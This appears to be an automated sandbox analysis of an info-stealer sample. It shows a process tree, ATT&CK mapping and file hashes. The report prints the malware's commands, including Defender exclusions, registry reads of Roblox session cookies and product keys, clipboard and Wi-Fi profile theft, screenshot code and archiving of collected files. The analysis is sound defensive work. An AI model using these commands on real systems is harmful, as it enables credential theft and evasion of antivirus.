BkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2464
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iw2tnqxv\iw2tnqxv.cmdline"
        5⤵
        
        PID:5888
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5BFB.tmp" "c:\Users\Admin\AppData\Local\Temp\iw2tnqxv\CSCAFA3197DC94C4745807AE633AB5FB46.TMP"
        6⤵
        
        PID:6040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4892
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5128
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5492
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:5596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:5728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:5796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5552
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:5676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19162\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\AOSBZ.zip" *"
    3⤵
    PID:1336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Fluxus.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5032

C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://flux.li/windows/start.php?HWID=a75e642d9b7d11ee8173806e6f6e69639120b4774850a8d91b5b1ab6aea5275a
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3020
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,18038551586098992584,9129373066647976402,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
    3⤵
    PID:4300
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,18038551586098992584,9129373066647976402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
    3⤵
    PID:4680
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,18038551586098992584,9129373066647976402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4596
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,18038551586098992584,9129373066647976402,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
    3⤵
    PID:5840
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,18038551586098992584,9129373066647976402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
    3⤵
    PID:2028
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,18038551586098992584,9129373066647976402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
    3⤵
    PID:5984
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,18038551586098992584,9129373066647976402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
    3⤵
    PID:4120
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,18038551586098992584,9129373066647976402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
    3⤵
    PID:5628
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,18038551586098992584,9129373066647976402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
    3⤵
    PID:3892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Fluxus.exe'
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
1⤵
PID:2228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1340

C:\Windows\system32\netsh.exe
netsh wlan show profile
1⤵
PID:2036

C:\Windows\system32\tree.com
tree /A /F
1⤵
PID:4436

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\system32\tree.com
tree /A /F
1⤵
PID:6016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5152

C:\Windows\system32\tree.com
tree /A /F
1⤵
PID:5344

C:\Windows\system32\tree.com
tree /A /F
1⤵
PID:1896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5944

C:\Windows\system32\getmac.exe
getmac
1⤵
PID:2044

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1088

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
1⤵
PID:2396

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
1⤵
PID:1704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:556

C:\Users\Admin\AppData\Local\Temp\_MEI19162\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI19162\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\AOSBZ.zip" *
1⤵
- Executes dropped EXE
PID:4864

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:5492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffaecf446f8,0x7ffaecf44708,0x7ffaecf44718
1⤵
PID:2384

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1356

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1836

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3564

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5e77545b7e1c504b2f5ce7c5cc2ce1fe

SHA1
d81a6af13cf31fa410b85471e4509124ebeaff7e

SHA256
cbb617cd6cde793f367df016b200d35ce3c521ab901bbcb52928576bb180bc11

SHA512
cbc65c61334a8b18ece79acdb30a4af80aa9448c3edc3902b00eb48fd5038bf6013d1f3f6436c1bcb637e78c485ae8e352839ca3c9ddf7e45b3b82d23b0e6e37

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
240B

MD5
c89da70c9b3fd3e9ec765c863b73f417

SHA1
fffdb60f1447c1a8ec67be61114fdedcd9a8b583

SHA256
4cbdb99755d4b535015245ed87dcae24f1bc1439b29fe0019557b6613df31fac

SHA512
fd07e1572d93cee139313078380f188f6ea123409a60a5f98c73bc7b2a43d988482a54368e40ff9f8da46bde8db9ced4998ca61a2be7f51aacfe47758ee3c49a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
42749031de9f8151e3f93a77e385f7f5

SHA1
0199aea92e71270e118bdeb1d65728641a2e7f5d

SHA256
a2344db95dce6dbb1221c663c7263bc6228eccf64c3b4cc0f0b34e8f9eff73bf

SHA512
246fe02e86820310d97eb4a3324e5bdf1afed3c9f07501c9408e5cf3c42588b7d8b8662b4c7a6d9346b0afc5d3eb24d8db23849705950228a28b796e79210e28

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
7cde02872df1b3065ad334be905e818b

SHA1
f74593108d55f3bd60a79958621c5bd0549b5fd8

SHA256
5d27cd9c637ea023b811ea5bff4bbfa54d0009a21ee8c9600e706e014e020487

SHA512
b229cb0971a89ba0fa91907ca9cae61dce1d89f4b48e8c1b8c39c7865f3c8056769e315e546dbe58b051db0330da728f445bf0ada619f9977b27d771c5f400d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
d7c1daf6f6fe1d1068f7bb0e8261cc83

SHA1
7c60ca83fde33320b441c1f3d7af273083fc912c

SHA256
5d96f9d87f06cdf719a37a81a7dd55a5f0bb6f847f3ed627d7f364d61dec6ce7

SHA512
2e822becd7a2a6627e727e02fd469a36311c6cab95331354dc16e2b5ee9ad2dec925b4463b97061417b7120e98aef0b3ff5dbf59d6fb66affe5b6fda624f955f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
91aa47975c6c24d4110447d0f419ebbf

SHA1
143a1d84bcd1be03a6a86722de023167bb5ff3b5

SHA256
2e59eb919bd826dd29d87546e58deeb50e4e2d837cde6fd3c31f84b4715760cd

SHA512
66a4ae3ddd9fcd8e2270398e038b52f6b0c4be936c24eaa6a11fb8da07d679a0cf00bc1fefa160c5fe59de56905ff316d1b367a229cddef0acb098e4a71108e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
6db2d2ceb22a030bd1caa72b32cfbf98

SHA1
fe50f35e60f88624a28b93b8a76be1377957618b

SHA256
7b22b0b16088ab7f7d6f938d7cfe9ae807856662ce3a63e7de6c8107186853e4

SHA512
d5a67a394003f559c98e1a1e9e31c2d473d04cc075b08bb0aab115ce42744da536895df2cec73fa54fc36f38d38e4906680cfacfbf4698ee925f1609fbb07912

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
8799bc12678f56b640ff83d8cccbcf6f

SHA1
bd8888625b2885528e9ceb0dd8e352ea353e1598

SHA256
d205696a3914bd19dba0950d05ce1343d8b7b0662d93639195234dd660613d49

SHA512
e18cc3c1c4d656b5e131cf28f00738d73f501bd70dbd9621857fcfffed9f6ed8caa8380011cfabe2140ca94f9c10aa3689a53ee424d4e4be67cac94833504c40

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
525971ec240960bbb5a361e03d2e72d6

SHA1
0268227eb3e723e519f753bfe06ee48889a3b990

SHA256
d42cd230585948c10e30a551473a2e266d268e839098673abdc53d438a7322cd

SHA512
b7b43307bd3944bc49d3da310ed11c96bedaeac248f42b4f87455c97fe3138ae22b00139d10e0eaf04404589c92cfc22c1d80dfdb5d8b8e3076cbd3a0645c760

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d6a45a54d5783e90ca8fe146c3670ee0

SHA1
5cd6fc7239aa11e8f98604d2d675415a5a6c6658

SHA256
9da7c4b182ea31b42860a414dd4a8e8c437f464caa37cdcb8b8f70bd8390f817

SHA512
867f8956ecb301685a465cd27bd30acc136e25f27dc329c95c848561cbb33503eb96f0607570279afffa4710a8847e54d603cf832d6d462c7c8715864d5d94c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e5ea61f668ad9fe64ff27dec34fe6d2f

SHA1
5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b

SHA256
8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466

SHA512
cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5BFB.tmp

Filesize
1KB

MD5
607b37d0b4bc1bf0a54f47da8eb7a0ab

SHA1
142540880fd73510d882031bfc3ad9e425eb8ff3

SHA256
a701cec566fe704063bab650e624e1442632351bee921f9de5d46a7bdcf9d7b9

SHA512
a90012a901f2fd9fd85757267d63489f4858d6cd8dfb54da14ca6caa9bba05ff1bd595ab0fd9926ba932c8221f354b67e63e9bc7906694ec85f12d6254c0f5e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19162\VCRUNTIME140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19162\_bz2.pyd

Filesize
48KB

MD5
20a7ecfe1e59721e53aebeb441a05932

SHA1
a91c81b0394d32470e9beff43b4faa4aacd42573

SHA256
7ebbe24da78b652a1b6fe77b955507b1daff6af7ff7e5c3fa5ac71190bde3da8

SHA512
99e5d877d34ebaaaeb281c86af3fff9d54333bd0617f1366e3b4822d33e23586ef9b11f4f7dd7e1e4a314c7a881f33123735294fe8af3a136cd10f80a9b8d902

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19162\_ctypes.pyd

Filesize
58KB

MD5
5006b7ea33fce9f7800fecc4eb837a41

SHA1
f6366ba281b2f46e9e84506029a6bdf7948e60eb

SHA256
8f7a5b0abc319ba9bfd11581f002e533fcbe4ca96cedd37656b579cd3942ef81

SHA512
e3e5e8f471a8ca0d5f0091e00056bd53c27105a946ca936da3f5897b9d802167149710404386c2ed3399b237b8da24b1a24e2561c436ed2e031a8f0564fbbc7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19162\_decimal.pyd

Filesize
106KB

MD5
d0231f126902db68d7f6ca1652b222c0

SHA1
70e79674d0084c106e246474c4fb112e9c5578eb

SHA256
69876f825678b717c51b7e7e480de19499d972cb1e98bbfd307e53ee5bace351

SHA512
b6b6bfd5fde200a9f45aeb7f6f845eac916feeef2e3fca54e4652e1f19d66ae9817f1625ce0ed79d62e504377011ce23fd95a407fbdbaa6911a09e48b5ef4179

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19162\_hashlib.pyd

Filesize
35KB

MD5
a81e0df35ded42e8909597f64865e2b3

SHA1
6b1d3a3cd48e94f752dd354791848707676ca84d

SHA256
